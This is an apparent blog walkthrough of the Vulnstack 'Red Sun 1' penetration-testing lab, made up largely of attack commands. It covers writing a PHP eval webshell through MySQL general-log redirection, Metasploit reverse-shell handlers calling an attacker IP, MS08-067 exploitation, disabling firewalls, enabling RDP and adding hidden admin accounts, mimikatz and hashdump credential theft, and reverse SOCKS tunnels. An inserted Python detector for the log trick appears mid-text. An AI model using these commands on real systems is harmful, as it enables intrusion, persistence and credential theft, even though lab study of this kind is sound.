红日靶机一 (Red Sun range, machine 1)

1. Getting a shell

show variables like '%general%';   # check the general log status

When general_log is on, every SQL statement that is executed is written to the stu1.log file. So if we change the value of general_log_file, the statements we execute are written into the file we chose instead, and that is how we get a shell.

SET GLOBAL general_log='on'

SHOW VARIABLES LIKE '%secure%'

SET GLOBAL general_log_file='C:/phpStudy/www/test1.php'   # change where the log file is written

Write the one-line webshell:

SELECT '<?php eval($_POST["cmd"]);?>'
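The log-redirect trick above works because the MySQL server itself writes its log file, so secure_file_priv does not restrict it. As an added example (not from the original post), here is a defender-side Python check: scan_log flags general-log statements that point general_log_file into a web-served path or carry server-side code, and check_variables audits a SHOW VARIABLES snapshot; the web-root hints and the sample log lines are constructed assumptions.

```python
import re
# Web-served path hints (assumption: common phpStudy/Apache/IIS layouts; extend as needed).
WEB_ROOT_HINTS = ("/www/", "/htdocs/", "/wwwroot/", "/inetpub/")
SERVED_EXTS = (".php", ".phtml", ".jsp", ".asp", ".aspx")
LOG_LINE_RE = re.compile(r"^\S+\s+(\d+)\s+Query\s+(.*)$")          # "<time> <thread> Query <sql>"
LOGFILE_RE = re.compile(r"\bgeneral_log_file\s*=\s*['\"]?([^'\";]+)", re.I)
CODE_TAG_RE = re.compile(r"<\?php|<\?=|<%|\beval\s*\(", re.I)     # server-side code markers

def is_web_path(path):
    """True when a path looks like one a web server would execute or serve."""
    p = path.replace("\\", "/").lower()
    return p.endswith(SERVED_EXTS) or any(h in p for h in WEB_ROOT_HINTS)

def classify(query):
    """Rule names one SQL statement trips; empty list when it looks benign."""
    hits = []
    m = LOGFILE_RE.search(query)
    if m and is_web_path(m.group(1)):
        hits.append("general_log_file_to_webroot")  # log redirected into a web directory
    if CODE_TAG_RE.search(query):
        hits.append("code_in_literal")  # PHP/ASP/JSP code embedded in SQL text
    return hits

def scan_log(log_text):
    """Return (thread_id, rule, statement) for every general-log line that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE_RE.match(line)
        if m:
            findings += [(int(m.group(1)), r, m.group(2)) for r in classify(m.group(2))]
    return findings

def check_variables(variables):
    """Audit a {name: value} dict taken from SHOW VARIABLES for the weak state this trick needs."""
    findings = []
    # secure_file_priv does not block the log write (the server writes its own log); the path is the key check.
    if (variables.get("general_log", "OFF").upper() == "ON"
            and is_web_path(variables.get("general_log_file", ""))):
        findings.append("general_log is ON and general_log_file points into a web-served path")
    if variables.get("secure_file_priv") == "":
        findings.append("secure_file_priv is empty: SELECT ... INTO OUTFILE is unrestricted")
    return findings

# Constructed sample general-log lines (not taken from the page's lab).
SAMPLE_LOG = """\
2020-08-22T10:01:15.000000Z     5 Query     SET GLOBAL general_log_file='C:/phpStudy/www/test1.php'
2020-08-22T10:01:20.000000Z     5 Query     SELECT '<?php eval($_POST["cmd"]);?>'
2020-08-22T10:02:00.000000Z     6 Query     SELECT id, name FROM users WHERE id = 7
"""
```

Because the attacker's later statements land in the redirected file rather than the original log, run check_variables on a periodic SHOW VARIABLES snapshot as well as scanning the log itself.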

Bring the host into CS (Cobalt Strike)

shell ipconfig

shell systeminfo

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.44.129

lhost => 192.168.44.129

msf exploit(handler) > set lport 2222

lport => 2222

msf exploit(handler) > exploit

getsystem: privilege escalation succeeded

Migrate the process

Turn off the firewall:

netsh firewall set opmode disable

Dump credentials:

run hashdump

load mimikatz

wdigest

Or do it directly from CS:

netsh advfirewall set allprofiles state off   # firewall off

Remote login

Enable 3389 (RDP):

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Add an administrator account:

net user username password /add

net localgroup administrators username /add

net user bienao 123.com /add

net localgroup administrators bienao /add

Code page 65001 (UTF-8) fixes garbled console output:

chcp 65001

Remote connection:

rdesktop 192.168.44.128:3389

Discover live hosts in the domain:

run windows/gather/enum_ad_computers

Add a route:

run autoroute -s 192.168.52.0/24

run autoroute -p

Information gathering

Identify the domain controller:

shell net view /domain

shell net time /domain

Run the sweep:

for /L %i IN (1,1,254) DO ping -w 2 -n 1 192.168.52.%i

arp -a   # host discovery

nmap --script=vuln 192.168.52.141

nmap --script=vuln 192.168.52.138

frp: create a reverse SOCKS proxy

Edit the frps.ini file:

vim frps.ini

Start frp:

./frps -c frps.ini

frpc.exe -c frpc.ini

Or (the IPs differ here):

ew: create a reverse SOCKS proxy

Kali: ./ew_for_linux64 -s rcsocks -l 1080 -e 1024

This command makes the public-facing server listen on ports 1080 and 1024; the attacker's machine connects to port 1080 and the target machine connects to port 1024.

Windows: .\ew_for_Win.exe -s rssocks -d 192.168.255.132 -e 1024

proxychains proxy:

vi /etc/proxychains.conf

msf5 exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi

msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.52.141

rhosts => 192.168.52.141

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp

msf5 exploit(windows/smb/ms08_067_netapi) > run

net user bienao 123.com /add

net localgroup administrators bienao /add

netsh advfirewall set allprofiles state off   # firewall off

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f   # enable 3389

Remote connection:

rdesktop 192.168.44.141:3389

Remote connection failed

getuid

run hashdump

wdigest   # get system account information

load mimikatz   # load mimikatz

kerberos   # get plaintext credentials

Send the domain controller session back to CS

meterpreter > background

[*] Backgrounding session 2...

msf5 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler

msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject

msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf5 exploit(windows/local/payload_inject) > set lhost 192.168.44.129

lhost => 192.168.44.129

msf5 exploit(windows/local/payload_inject) > set lport 1111

lport => 1111

msf5 exploit(windows/local/payload_inject) > set session 2

session => 2

msf5 exploit(windows/local/payload_inject) > set disablepayloadhandler true

disablepayloadhandler => true

msf5 exploit(windows/local/payload_inject) > run

References

https://blog.csdn.net/qq_42349134/article/details/103135062

https://www.cooyf.com/bj/vulnstack1.html#0x04%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F

Original post: https://www.cnblogs.com/bingtang123/p/13548966.html